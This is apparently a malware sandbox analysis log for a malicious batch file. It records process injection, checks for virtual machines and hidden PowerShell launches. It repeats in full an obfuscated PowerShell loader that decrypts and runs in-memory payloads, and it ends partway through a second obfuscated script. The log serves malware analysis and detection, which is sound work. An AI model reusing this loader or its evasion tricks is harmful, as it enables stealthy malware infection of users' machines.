Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 700000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 610000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 630000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 470000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 490000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1320000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1340000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 800000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 820000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 430000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 450000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: AF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 10F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1110000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 420000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 440000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1280000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 12A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B421F20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B421F50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24D756E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24D75710000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 1F0C6720000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 1F0C6750000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1EBD5460000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1EBD5490000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1B4448A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1B4448D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1B7B9BC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1B7B9BF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1A38DBE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1FE3A940000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1A38DC10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1FE3BA50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1B6C0940000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1B6C0990000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 18FE8A50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 2C9A6100000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 2C9A6150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2E0D9CC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2E0F4010000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 250A4740000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 250A4AE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1F1ACC50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1F1ACD70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1F188E00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1DA71D90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 25791060000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1DA73E60000
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk='); $eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A=='); $HrolG=$eOCgk.CreateDecryptor(); $IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length); $HrolG.Dispose(); $eOCgk.Dispose(); $IcZIb;}function YVagc($qgBgH){ Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', ''); Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IvNNq=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($KSWxg, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IvNNq.CopyTo($QmRKw); $IvNNq.Dispose(); $KSWxg.Dispose(); $QmRKw.Dispose(); $QmRKw.ToArray();}function bKLzO($qgBgH,$HpAZd){ Invoke-Expression '$Koibj=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$qgBgH);'.Replace('blck', ''); Invoke-Expression '$eMXWr=$Koibj.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$eMXWr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $HpAZd)blck;'.Replace('blck', '');}$DgVFr = 'C:\Users\user\Desktop\1 (2).cmd';$host.UI.RawUI.WindowTitle = $DgVFr;$BZwPR=[System.IO.File]::ReadAllText($DgVFr).Split([Environment]::NewLine);foreach ($BpbHj in $BZwPR) { if ($BpbHj.StartsWith(':: ')) { $syTFV=$BpbHj.Substring(3); break; }}$eWOHt=[string[]]$syTFV.Split('\');Invoke-Expression '$fHjin=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[0])));'.Replace('blck', '');Invoke-Expression '$gCnqy=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[1])));'.Replace('blck', '');bKLzO $fHjin (,[string[]] (''));bKLzO $gCnqy (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk='); $eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A=='); $HrolG=$eOCgk.CreateDecryptor(); $IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length); $HrolG.Dispose(); $eOCgk.Dispose(); $IcZIb;}function YVagc($qgBgH){ Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', ''); Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IvNNq=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($KSWxg, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IvNNq.CopyTo($QmRKw); $IvNNq.Dispose(); $KSWxg.Dispose(); $QmRKw.Dispose(); $QmRKw.ToArray();}function bKLzO($qgBgH,$HpAZd){ Invoke-Expression '$Koibj=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$qgBgH);'.Replace('blck', ''); Invoke-Expression '$eMXWr=$Koibj.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$eMXWr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $HpAZd)blck;'.Replace('blck', '');}$DgVFr = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DgVFr;$BZwPR=[System.IO.File]::ReadAllText($DgVFr).Split([Environment]::NewLine);foreach ($BpbHj in $BZwPR) { if ($BpbHj.StartsWith(':: ')) { $syTFV=$BpbHj.Substring(3); break; }}$eWOHt=[string[]]$syTFV.Split('\');Invoke-Expression '$fHjin=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[0])));'.Replace('blck', '');Invoke-Expression '$gCnqy=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[1])));'.Replace('blck', '');bKLzO $fHjin (,[string[]] (''));bKLzO $gCnqy (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{efb95082-f278-4e03-9e3f-6389e31f9866}
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function pnnxp($qgbgh){ $eocgk=[system.security.cryptography.aes]::create(); $eocgk.mode=[system.security.cryptography.ciphermode]::cbc; $eocgk.padding=[system.security.cryptography.paddingmode]::pkcs7; $eocgk.key=[system.convert]::frombase64string('y9z5o9ck+dhycwqkzoy/iwepx+o8iv9a3dgjbxpgjzk='); $eocgk.iv=[system.convert]::frombase64string('6xsbrvuro9xqg710dey/2a=='); $hrolg=$eocgk.createdecryptor(); $iczib=$hrolg.transformfinalblock($qgbgh, 0, $qgbgh.length); $hrolg.dispose(); $eocgk.dispose(); $iczib;}function yvagc($qgbgh){ invoke-expression '$kswxg=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$qgbgh);'.replace('blck', ''); invoke-expression '$qmrkw=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$ivnnq=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($kswxg, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $ivnnq.copyto($qmrkw); $ivnnq.dispose(); $kswxg.dispose(); $qmrkw.dispose(); $qmrkw.toarray();}function bklzo($qgbgh,$hpazd){ invoke-expression '$koibj=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$qgbgh);'.replace('blck', ''); invoke-expression '$emxwr=$koibj.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$emxwr.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $hpazd)blck;'.replace('blck', '');}$dgvfr = 'c:\users\user\desktop\1 (2).cmd';$host.ui.rawui.windowtitle = $dgvfr;$bzwpr=[system.io.file]::readalltext($dgvfr).split([environment]::newline);foreach ($bpbhj in $bzwpr) { if ($bpbhj.startswith(':: ')) { $sytfv=$bpbhj.substring(3); break; }}$ewoht=[string[]]$sytfv.split('\');invoke-expression '$fhjin=yvagc (pnnxp (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ewoht[0])));'.replace('blck', '');invoke-expression '$gcnqy=yvagc (pnnxp (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ewoht[1])));'.replace('blck', '');bklzo $fhjin (,[string[]] (''));bklzo $gcnqy (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function pnnxp($qgbgh){ $eocgk=[system.security.cryptography.aes]::create(); $eocgk.mode=[system.security.cryptography.ciphermode]::cbc; $eocgk.padding=[system.security.cryptography.paddingmode]::pkcs7; $eocgk.key=[system.convert]::frombase64string('y9z5o9ck+dhycwqkzoy/iwepx+o8iv9a3dgjbxpgjzk='); $eocgk.iv=[system.convert]::frombase64string('6xsbrvuro9xqg710dey/2a=='); $hrolg=$eocgk.createdecryptor(); $iczib=$hrolg.transformfinalblock($qgbgh, 0, $qgbgh.length); $hrolg.dispose(); $eocgk.dispose(); $iczib;}function yvagc($qgbgh){ invoke-expression '$kswxg=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$qgbgh);'.replace('blck', ''); invoke-expression '$qmrkw=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$ivnnq=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($kswxg, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $ivnnq.copyto($qmrkw); $ivnnq.dispose(); $kswxg.dispose(); $qmrkw.dispose(); $qmrkw.toarray();}function bklzo($qgbgh,$hpazd){ invoke-expression '$koibj=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$qgbgh);'.replace('blck', ''); invoke-expression '$emxwr=$koibj.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$emxwr.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $hpazd)blck;'.replace('blck', '');}$dgvfr = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $dgvfr;$bzwpr=[system.io.file]::readalltext($dgvfr).split([environment]::newline);foreach ($bpbhj in $bzwpr) { if ($bpbhj.startswith(':: ')) { $sytfv=$bpbhj.substring(3); break; }}$ewoht=[string[]]$sytfv.split('\');invoke-expression '$fhjin=yvagc (pnnxp (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ewoht[0])));'.replace('blck', '');invoke-expression '$gcnqy=yvagc (pnnxp (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ewoht[1])));'.replace('blck', '');bklzo $fhjin (,[string[]] (''));bklzo $gcnqy (,[string[]] (''));
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:aywzgkditfai{param([outputtype([type])][parameter(position=0)][type[]]$fjpxtsrgmukcyl,[parameter(position=1)][type]$dkfbmaokcb)$quflgqkjgbw=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+[char](82)+''+[char](101)+''+'f'+''+[char](108)+''+[char](101)+'c'+[char](116)+''+'e'+''+[char](100)+''+'d'+''+[char](101)+''+[char](108)+''+[char](101)+''+[char](103)+'ate')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule('i'+[char](110)+''+'m'+''+[char](101)+''+'m'+'o'+[char](114)+''+[char](121)+''+[char](77)+''+'o'+''+[char](100)+''+[char](117)+'l'+'e'+'',$false).definetype('m'+[char](121)+'de'+[char](108)+'eg'+'a'+''+[char](116)+''+[char](101)+''+[char](84)+''+'y'+''+[char](112)+''+[char](101)+'',''+[char](67)+''+[char](108)+''+[char](97)+''+[char](115)+''+'s'+''+[char](44)+''+[char](80)+'ub'+[char](108)+''+'i'+''+[char](99)+''+','+''+'s'+''+'e'+'a'+[char](108)+'e'+[char](100)+''+','+''+[char](65)+''+[char](110)+''+[char](115)+'i'+'c'+''+[char](108)+''+[char](97)+''+[char](115)+''+'s'+','+[char](65)+''+[char](117)+''+[char](116)+''+[char](111)+''+'c'+''+[char](108)+''+[char](97)+''+[char](115)+''+[char](115)+'',[multicastdelegate]);$quflgqkjgbw.defineconstructor(''+[char](82)+'t'+'s'+''+[char](112)+''+'e'+''+[char](99)+''+[char](105)+''+[char](97)+''+'l'+''+[char](78)+''+[char](97)+''+'m'+''+[char](101)+','+'h'+''+'i'+''+'d'+''+[char](101)+''+'b'+''+[char](121)+''+[char](83)+''+[char](105)+''+[char](103)+''+[char](44)+''+'p'+'u'+[char](98)+''+[char](108)+''+[char](105)+''+[char](99)+'',[reflection.callingconventions]::standard,$fjpxtsrgmukcyl).setimplementationflags(''+'r'+'u'+'n'+''+'t'+''+[char](105)+''+'m'+''+[char](101)+''+','+''+[char](77)+''+[char](97)+''+[char](110)+''+[char](97)+'g'+[char](101)+''+[char](100)+'');$quflgqkjgbw.definemethod(''+[char](73)+''+[char](110)+''+[char](118)+''+'o'+''+[char](107)+''+[char](101)+'','p'+[char](117)+''+[char](98)+''+[char](108)+''+[char](105)+'c'+[char](44)+''+[char](72)+'i'+[char](100)+''+[char](101)+''+'b'+''+[char](121)+''+[char](83)+'i'+[char](103)+''+[char](44)+'n'+[char](101)+''+'w'+'s'+[char](108)+''+[char](111)+''+'t'+''+[char](44)+'v'+[char](105)+''+'r'+''+[char](116)+''+[char](117)+'a'+[char](108)+'',$dkfbmaokcb,$fjpxtsrgmukcyl).setimplementationflags(''+[char](82)+''+[char](117)+''+[char](110)+''+[char](116)+''+'i'+'m'+[char](101)+''+','+''+'m'+''+[char](97)+''+'n'+''+'a'+'g'+[char](101)+'d');write-output $quflgqkjgbw.createtype();}$wrnqvvfrvlsrh=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals('s'+[char](121)+''+[char](115)+'tem'+[char](46)+''+[char](100)+''+[char](108)+'l')}).gettype(''+'m'+''+[char](105)+''+'c'+''+[char](114)+''+[char](111)+''+'s'+''+'o'+''+[char](102)+''+[char](116)+''+'.'+'w'+'i'+''+[char](110)+''+[char](51)+''+[char](50)+''
